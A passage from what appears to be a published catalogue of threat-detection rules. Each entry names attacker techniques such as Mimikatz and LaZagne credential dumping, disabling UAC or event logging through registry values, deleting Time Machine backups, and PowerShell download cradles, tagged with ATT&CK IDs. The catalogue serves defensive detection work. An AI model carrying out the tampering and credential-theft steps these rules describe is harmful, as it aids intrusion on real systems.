    Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.

  • Suspicious External WebDAV Execution

    Apr 16, 2025 · attack.initial-access attack.t1584 attack.t1566

    Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.

  • System Information Discovery Via Sysctl - MacOS

    Apr 16, 2025 · attack.defense-evasion attack.t1497.001 attack.discovery attack.t1082

    Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.

  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS

    Apr 16, 2025 · attack.impact attack.t1490

    Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.

  • Time Machine Backup Disabled Via Tmutil - MacOS

    Apr 16, 2025 · attack.impact attack.t1490

    Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring.

  • UAC Notification Disabled

    Apr 16, 2025 · attack.privilege-escalation attack.defense-evasion attack.t1548.002

    Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.

  • UAC Secure Desktop Prompt Disabled

    Apr 16, 2025 · attack.privilege-escalation attack.defense-evasion attack.t1548.002

    Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.

  • Uncommon File Creation By Mysql Daemon Process

    Apr 16, 2025 · attack.defense-evasion

    Detects the creation of files with scripting or executable extensions by the MySQL daemon, which could be an indicator of "User Defined Functions" abuse to download malware.

  • Uncommon Process Access Rights For Target Image

    Apr 16, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1055.011

    Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.

  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted

    Apr 16, 2025 · attack.collection attack.t1113

    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.

  • Windows Recall Feature Enabled - Registry

    Apr 16, 2025 · attack.collection attack.t1113

    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.

  • Windows Recall Feature Enabled Via Reg.EXE

    Apr 16, 2025 · attack.collection attack.t1113

    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.

  • Potential Adplus.EXE Abuse

    Apr 16, 2025 · attack.defense-evasion attack.execution attack.credential-access attack.t1003.001

    Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.

  • Potential Binary Impersonating Sysinternals Tools

    Apr 16, 2025 · attack.execution attack.defense-evasion attack.t1218 attack.t1202 attack.t1036.005

    Detects binaries that use the same name as legitimate Sysinternals tools to evade detection. This rule looks for the execution of binaries that are named similarly to Sysinternals tools. Adversaries may rename their malicious tools as legitimate Sysinternals tools to evade detection.

  • Potential CVE-2023-23397 Exploitation Attempt - SMB

    Apr 10, 2025 · attack.exfiltration cve.2023-23397 detection.emerging-threats

    Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.

  • Buffer Overflow Attempts

    Apr 7, 2025 · attack.t1068 attack.privilege-escalation

    Detects buffer overflow attempts in Unix system log files

  • AWS New Lambda Layer Attached

    Apr 7, 2025 · attack.privilege-escalation

    Detects when a user attaches a Lambda layer to an existing Lambda function. A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role. This would give an adversary access to resources that the function has access to.

  • Conhost Spawned By Uncommon Parent Process

    Apr 7, 2025 · attack.execution attack.t1059

    Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

  • Elevated System Shell Spawned From Uncommon Parent Location

    Apr 7, 2025 · attack.privilege-escalation attack.defense-evasion attack.execution attack.t1059

    Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.

  • Potential Binary Or Script Dropper Via PowerShell

    Apr 7, 2025 · attack.persistence

    Detects PowerShell creating a binary executable or a script file.

  • Potential WinAPI Calls Via CommandLine

    Apr 7, 2025 · attack.execution attack.t1106

    Detects the use of WinAPI functions via the command line, as seen used by threat actors via the tool winapiexec.

  • Python Initiated Connection

    Apr 7, 2025 · attack.discovery attack.t1046

    Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.

  • Whoami.EXE Execution Anomaly

    Apr 7, 2025 · attack.discovery attack.t1033 car.2016-03-001

    Detects the execution of whoami.exe with suspicious parent processes.

  • Windows Processes Suspicious Parent Directory

    Apr 7, 2025 · attack.defense-evasion attack.t1036.003 attack.t1036.005

    Detects suspicious parent processes of well-known Windows processes.

  • Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock

    Apr 7, 2025 · attack.reconnaissance attack.discovery attack.credential-access attack.t1018 attack.t1558 attack.t1589.002

    Detects the use of the "Get-ADComputer" cmdlet in order to identify systems which are configured for unconstrained delegation.

  • Operator Bloopers Cobalt Strike Commands

    Mar 18, 2025 · attack.execution attack.t1059.003 stp.1u

    Detects use of Cobalt Strike commands accidentally entered in the CMD shell

  • AnyDesk Network

    Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219

    Detects use of AnyDesk

  • Bumblebee WmiPrvSE execution pattern

    Mar 18, 2025 · attack.defense-evasion attack.t1036

    Detects Bumblebee WmiPrvSE parent process manipulation

  • Conhost Suspicious Command Execution

    Mar 18, 2025 · attack.defense-evasion attack.t1564.003 dist.public

    Detects use of conhost in "headless" mode. Running conhost.exe in "headless" mode means that no visible window will pop up on the victim's machine.

  • Custom Cobalt Strike Command Execution

    Mar 18, 2025 · attack.defense-evasion attack.t1562.001 attack.execution attack.t1059.001

    Detects the execution of a specific OneLiner to Invoke PowerShell commands.

  • Deleting Windows Defender scheduled tasks

    Mar 18, 2025 · attack.defense-evasion attack.t1562.001

    Detects the deletion of scheduled tasks related to Windows Defender.

  • Enable WDigest using PowerShell

    Mar 18, 2025 · attack.defense-evasion attack.t1112

    Rule to detect registry modifications to enable WDigest using PowerShell over the command line.

  • Enable WDigest using PowerShell (ps_module)

    Mar 18, 2025 · attack.defense-evasion attack.t1112

    Rule to detect registry modifications to enable WDigest using PowerShell script modules.

  • Enabling RDP service via reg.exe command execution

    Mar 18, 2025 · attack.defense-evasion attack.lateral-movement attack.t1021.001 attack.t1112

    Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host

  • Enabling restricted admin mode

    Mar 18, 2025 · attack.defense-evasion attack.t1562.001

    Detects the registry modification to enable restricted admin mode using reg.exe

  • Exchange WebShell Creation

    Mar 18, 2025 · attack.t1505.003 attack.persistence attack.t1190 attack.initial-access

    These commands were used to create a WebShell by exploiting ProxyShell vulnerabilities

  • Execution of ZeroLogon PoC executable

    Mar 18, 2025 · attack.execution attack.lateral-movement attack.t1210

    Detects the execution of the commonly used ZeroLogon PoC executable.

  • FlawedGrace spawning threat injection target

    Mar 18, 2025 · attack.defense-evasion attack.t1055 dist.public

    Detects the command FlawedGrace uses to spawn a process, in this case cmd.exe, for the purpose of injecting into it.

  • Hiding local user accounts

    Mar 18, 2025 · attack.t1564.002 attack.defense-evasion

    Detects the use of reg.exe to hide users from being listed on the logon screen. This is possible by changing the registry key value to 0 for a specific user.

  • Invoke-ShareFinder Module Load Detection

    Mar 18, 2025 · attack.discovery attack.t1135 dist.public

    Use of Invoke-ShareFinder detected via PowerShell logging

  • Invoke-ShareFinder Script Block Execution

    Mar 18, 2025 · attack.discovery attack.t1135 dist.public

    Use of Invoke-ShareFinder detected via PowerShell Script Block logging

  • JavaScript Execution Using MSDOS 8.3 File Notation

    Mar 18, 2025 · attack.defense-evasion attack.t1059 dist.public

    Detects script execution using MSDOS 8.3 File names

  • Lazagne dumping credentials

    Mar 18, 2025 · attack.credential-access attack.t1555

    Detects the use of LaZagne via command line execution.

  • Mimikatz Command Line With Ticket Export

    Mar 18, 2025 · attack.credential-access attack.t1003 attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006

    Detection of well-known mimikatz command line arguments. Added more command line indicators from the referenced rule by author Teymur Kheirkhabarov, oscd.community.

  • Mshta Executing from Registry

    Mar 18, 2025 · attack.defense-evasion attack.t1218.005

    Detects Mshta executing code from the registry.

  • Operator Bring Your Own Tools

    Mar 18, 2025 · attack.command-and-control attack.t1105

    Detects use of custom scripts, i.e. BAT files.

  • Potential Qbot SMB DLL Lateral Movement

    Mar 18, 2025 · attack.lateral-movement attack.t1570

    Detection of potential use of SMB to transfer DLLs into the C$ folder of hosts, unique to Qbot malware, for purposes of lateral movement.

  • Potential SMB DLL Lateral Movement

    Mar 18, 2025 · attack.lateral-movement attack.t1570

    Detection of potential use of SMB to transfer DLLs into the ProgramData folder of hosts for purposes of lateral movement.

  • QBot process creation from scheduled task REGSVR32 (regsvr32.exe), -s flag and SYSTEM in the command line

    Mar 18, 2025 · attack.persistence attack.privilege-escalation attack.t1053.005

    Detects the process creation from Scheduled Task with REGSVR32 (regsvr32.exe), -s flag and SYSTEM in the command line

  • QBot scheduled task REGSVR32 with C$ image path

    Mar 18, 2025 · attack.persistence attack.privilege-escalation attack.t1053.005

    Detects the creation of Scheduled Task with REGSVR32 (regsvr32.exe) and C$ in the image path field

  • Renamed Autohotkey Binary

    Mar 18, 2025 · attack.defense-evasion attack.t1036.003

    Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point.

  • SplashTop Network

    Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219

    Detects use of SplashTop.

  • SplashTop Process

    Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219

    Detects use of SplashTop.

  • SSH over port 443 with known Server and Client Strings

    Mar 18, 2025 · attack.command-and-control attack.t1572

    Detects the presence of known SSH client and SSH server strings that have been used for SSH tunneling.

  • Suspicious Commands by SQL Server

    Mar 18, 2025 · attack.initial-access attack.persistence attack.privilege-escalation

    Detects suspicious commands spawned by the sqlservr process.

  • Viewing remote directories

    Mar 18, 2025 · attack.discovery attack.t1083 dist.public

    Detects the use of the dir command to inspect directories on a remote host.

  • Potential APT FIN7 Exploitation Activity

    Mar 16, 2025 · attack.execution attack.t1059.001 attack.t1059.003 detection.emerging-threats

    Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to log in to a target server and initiate specific Windows process chains.

  • Service Reload or Start - Linux

    Mar 4, 2025 · attack.persistence attack.t1543.002

    Detects the start, reload or restart of a service.

  • Notepad Password Files Discovery

    Mar 4, 2025 · attack.discovery attack.t1083

    Detects the execution of Notepad to open a file whose name contains the string "password", which may indicate unauthorized access to credentials or suspicious activity.

  • ADS Zone.Identifier Deleted By Uncommon Application

    Mar 4, 2025 · attack.defense-evasion attack.t1070.004

    Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS, such as Microsoft Office apps.

  • Cisco Duo Successful MFA Authentication Via Bypass Code

    Mar 4, 2025 · attack.credential-access attack.defense-evasion attack.initial-access

    Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.

  • Forest Blizzard APT - Custom Protocol Handler Creation

    Mar 4, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats

    Detects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT.

  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set

    Mar 4, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats

    Detects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT.

  • Forest Blizzard APT - JavaScript Constrained File Creation

    Mar 4, 2025 · attack.defense-evasion attack.t1562.002 detection.emerging-threats

    Detects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in the Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.

  • Kubernetes Unauthorized or Unauthenticated Access

    Mar 4, 2025 · attack.privilege-escalation

    Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained.

  • Outbound Network Connection Initiated By Microsoft Dialer

    Mar 4, 2025 · attack.execution attack.t1071.001

    Detects an outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. It is an outdated process in its current context of usage and is a common target of info stealers for process injection, where it is used to make C2 connections; a common example is "Rhadamanthys".

  • Pnscan Binary Data Transmission Activity

    Mar 4, 2025 · attack.discovery attack.t1046

    Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT.

  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection

    Mar 4, 2025 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion cve.2024-3400 detection.emerging-threats

    Detects potential exploitation attempts of CVE-2024-3400, an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.

  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation

    Mar 4, 2025 · attack.execution cve.2024-3400 detection.emerging-threats

    Detects suspicious file creations in the Palo Alto Networks PAN-OS parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.

  • PUA - SoftPerfect Netscan Execution

    Mar 4, 2025 · attack.discovery attack.t1046

    Detects usage of SoftPerfect's "netscan.exe", an application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.

  • RegAsm.EXE Initiating Network Connection To Public IP

    Mar 4, 2025 · attack.defense-evasion attack.t1218.009

    Detects "RegAsm.exe" initiating a network connection to public IP addresses.

  • Malicious PowerShell Commandlets - PoshModule

    Mar 4, 2025 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001

    Detects cmdlet names from well-known PowerShell exploitation frameworks.

  • Malicious PowerShell Commandlets - ProcessCreation

    Mar 4, 2025 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001

    Detects cmdlet names from well-known PowerShell exploitation frameworks.

  • Malicious PowerShell Scripts - FileCreation

    Mar 4, 2025 · attack.execution attack.t1059.001

    Detects the creation of known offensive PowerShell scripts used for exploitation.

  • Malicious PowerShell Scripts - PoshModule

    Mar 4, 2025 · attack.execution attack.t1059.001

    Detects the execution of known offensive PowerShell scripts used for exploitation or reconnaissance.

  • Anydesk Remote Access Software Service Installation

    Mar 4, 2025 · attack.persistence

    Detects the installation of the AnyDesk software service, which could be an indication of AnyDesk abuse if the software isn't already in use in the environment.

  • Remote Access Tool - AnyDesk Execution

    Mar 4, 2025 · attack.command-and-control attack.t1219

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

  • Remote Access Tool - Anydesk Execution From Suspicious Folder

    Mar 4, 2025 · attack.command-and-control attack.t1219

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

  • Remote Access Tool - AnyDesk Incoming Connection

    Mar 4, 2025 · attack.persistence attack.command-and-control attack.t1219

    Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as a potential command and control channel.

  • Suspicious Binary Writes Via AnyDesk

    Mar 4, 2025 · attack.command-and-control attack.t1219

    Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)

  • Nslookup PowerShell Download Cradle

    Mar 4, 2025 · attack.execution attack.t1059.001

    Detects a PowerShell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.

  • HTTP Request to Low Reputation TLD or Suspicious File Extension

    Mar 4, 2025 · attack.initial-access attack.command-and-control

    Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.

  • Backup Files Deleted

    Feb 28, 2025 · attack.impact attack.t1490

    Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

  • File Deleted Via Sysinternals SDelete

    Feb 28, 2025 · attack.defense-evasion attack.t1070.004

    Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

  • Potential Obfuscated Ordinal Call Via Rundll32

    Feb 25, 2025 · attack.defense-evasion attack.t1027.010

    Detects execution of "rundll32" with potentially obfuscated ordinal calls.

  • Process Memory Dump Via Comsvcs.DLL

    Feb 25, 2025 · attack.defense-evasion attack.credential-access attack.t1036 attack.t1003.001 car.2013-05-009

    Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.).

  • Potential CVE-2024-35250 Exploitation Activity

    Feb 24, 2025 · attack.privilege-escalation attack.t1068 cve.2024-35250 detection.emerging-threats

    Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.

  • Clfs.SYS Loaded By Process Located In a Potential Suspicious Location

    Feb 22, 2025 · attack.execution attack.t1059

    Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVE exploits that target the Common Log File System.

  • Python Inline Command Execution

    Feb 22, 2025 · attack.execution attack.t1059

    Detects execution of python using the "-c" flag. This could be used as a way to launch a reverse shell or execute live python code.

  • Suspicious Non-Browser Network Communication With Google API

    Feb 22, 2025 · attack.command-and-control attack.t1102

    Detects a non-browser process interacting with the Google API, which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet).

  • Windows Event Log Access Tampering Via Registry

    Feb 17, 2025 · attack.t1547.001 attack.t1112

    Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".

  • Kalambur Backdoor Curl TOR SOCKS Proxy Execution

    Feb 17, 2025 · attack.command-and-control attack.t1090 attack.t1573 attack.t1071.001 attack.t1059.001 attack.s0183 detection.emerging-threats

    Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.

  • AADInternals PowerShell Cmdlets Execution - ProccessCreation

    Feb 17, 2025 · attack.execution attack.reconnaissance attack.discovery attack.credential-access attack.impact

    Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 which can be abused by threat actors to attack Azure AD or Office 365.

  • AADInternals PowerShell Cmdlets Execution - PsScript

    Feb 17, 2025 · attack.execution attack.reconnaissance attack.discovery attack.credential-access attack.impact

    Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 which can be abused by threat actors to attack Azure AD or Office 365.

  • PUA - NimScan Execution

    Feb 17, 2025 · attack.discovery attack.t1046

    Detects usage of NimScan, a portscanner utility. In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment. This rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.

  • Schtasks Creation Or Modification With SYSTEM Privileges

    Feb 17, 2025 · attack.execution attack.persistence attack.t1053.005

    Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges.

  • Add Port Monitor Persistence in Registry

    Feb 3, 2025 · attack.persistence attack.t1547.010

    Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.

  • Change Winevt Channel Access Permission Via Registry

    Feb 3, 2025 · attack.defense-evasion attack.t1562.002

    Detects tampering with the "ChannelAccess" registry key in order to change access to a Windows event channel.

  • Container With A hostPath Mount Created

    Feb 3, 2025 · attack.t1611

    Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.

  • Creation Of Pod In System Namespace

    Feb 3, 2025 · attack.t1036.005

    Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets, have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container, e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.

  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection

    Feb 3, 2025 · attack.initial-access cve.2024-1212 detection.emerging-threats

    Detects potential exploitation of CVE-2024-1709, an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to the '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value containing an uncommon character.

  • Deployment Deleted From Kubernetes Cluster

    Feb 3, 2025 · attack.t1498

    Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.

  • Disable Windows Event Logging Via Registry

    Feb 3, 2025 · attack.defense-evasion attack.t1562.002

    Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel.

  • Displaying Hidden Files Feature Disabled

    Feb 3, 2025 · attack.defense-evasion attack.t1564.001

    Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.

  • EVTX Created In Uncommon Location

    Feb 3, 2025 · attack.defense-evasion attack.t1562.002

    Detects the creation of new files with the ".evtx" extension in an uncommon or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls, or simply exfiltration of event logs to search for sensitive information within. Note that backup software and legitimate administrators might perform similar actions during troubleshooting.

  • Kernel Memory Dump Via LiveKD

    Feb 3, 2025 · attack.defense-evasion

    Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory.

  • Kubernetes Events Deleted

    Feb 3, 2025 · attack.t1070

    Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.

  • Kubernetes Secrets Enumeration

    Feb 3, 2025 · attack.t1552.007

    Detects enumeration of Kubernetes secrets.

  • Loaded Module Enumeration Via Tasklist.EXE

    Feb 3, 2025 · attack.t1003

    Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question, in order to dump the process memory or perform other nefarious actions.

  • MaxMpxCt Registry Value Changed

    Feb 3, 2025 · attack.defense-evasion attack.t1070.005

    Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note that if the value is set beyond 125, older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.

  • New Kubernetes Service Account Created

    Feb 3, 2025 · attack.t1136

    Detects creation of a new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.

  • New TimeProviders Registered With Uncommon DLL Name

    Feb 3, 2025 · attack.persistence attack.privilege-escalation attack.t1547.003

    Detects processes setting a new DLL in DllName under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.

  • OpenCanary - FTP Login Attempt

    Feb 3, 2025 · attack.initial-access attack.exfiltration attack.t1190 attack.t1021

    Detects instances where an FTP service on an OpenCanary node has had a login attempt.

  • OpenCanary - GIT Clone Request

    Feb 3, 2025 · attack.collection attack.t1213

    Detects instances where a Git service on an OpenCanary node has had a Git clone request.

  • OpenCanary - HTTP GET Request

    Feb 3, 2025 · attack.initial-access attack.t1190

    Detects instances where an HTTP service on an OpenCanary node has received a GET request.

  • OpenCanary - HTTP POST Login Attempt

    Feb 3, 2025 · attack.initial-access attack.t1190

    Detects instances where an HTTP service on an OpenCanary node has had a login attempt via form POST.

  • OpenCanary - HTTPPROXY Login Attempt

    Feb 3, 2025 · attack.initial-access attack.defense-evasion attack.t1090

    Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.

  • OpenCanary - MSSQL Login Attempt Via SQLAuth

    Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213

    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.

  • OpenCanary - MSSQL Login Attempt Via Windows Authentication

    Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213

    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.

  • OpenCanary - MySQL Login Attempt

    Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213

    Detects instances where a MySQL service on an OpenCanary node has had a login attempt.

  • OpenCanary - NTP Monlist Request

    Feb 3, 2025 · attack.impact attack.t1498

    Detects instances where an NTP service on an OpenCanary node has had an NTP monlist request.

  • OpenCanary - REDIS Action Command Attempt

    Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213

    Detects instances where a Redis service on an OpenCanary node has had an action command attempted.

  • OpenCanary - SIP Request

    Feb 3, 2025 · attack.collection attack.t1123

    Detects instances where a SIP service on an OpenCanary node has had a SIP request.

  • OpenCanary - SMB File Open Request

    Feb 3, 2025 · attack.lateral-movement attack.collection attack.t1021 attack.t1005

    Detects instances where an SMB service on an OpenCanary node has had a file open request.

  • OpenCanary - SNMP OID Request

    Feb 3, 2025 · attack.discovery attack.lateral-movement attack.t1016 attack.t1021

    Detects instances where an SNMP service on an OpenCanary node has had an OID request.

  • OpenCanary - SSH Login Attempt

    Feb 3, 2025 · attack.initial-access attack.lateral-movement attack.persistence attack.t1133 attack.t1021 attack.t1078

    Detects instances where an SSH service on an OpenCanary node has had a login attempt.

  • OpenCanary - SSH New Connection Attempt

    Feb 3, 2025 · attack.initial-access attack.lateral-movement attack.persistence attack.t1133 attack.t1021 attack.t1078

    Detects instances where an SSH service on an OpenCanary node has had a connection attempt.

  • OpenCanary - Telnet Login Attempt

    Feb 3, 2025 · attack.initial-access attack.command-and-control attack.t1133 attack.t1078

    Detects instances where a Telnet service on an OpenCanary node has had a login attempt.

  • OpenCanary - TFTP Request

    Feb 3, 2025 · attack.exfiltration attack.t1041

    Detects instances where a TFTP service on an OpenCanary node has had a request.

  • OpenCanary - VNC Connection Attempt

    Feb 3, 2025 · attack.lateral-movement attack.t1021

    Detects instances where a VNC service on an OpenCanary node has had a connection attempt.

  • Potential KamiKakaBot Activity - Lure Document Execution

    Feb 3, 2025 · attack.execution attack.t1059 detection.emerging-threats

    Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.

  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation

    Feb 3, 2025 · attack.persistence detection.emerging-threats

    Detects the creation of a scheduled task that runs weekly and executes the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.

  • Potential KamiKakaBot Activity - Winlogon Shell Persistence

    Feb 3, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats

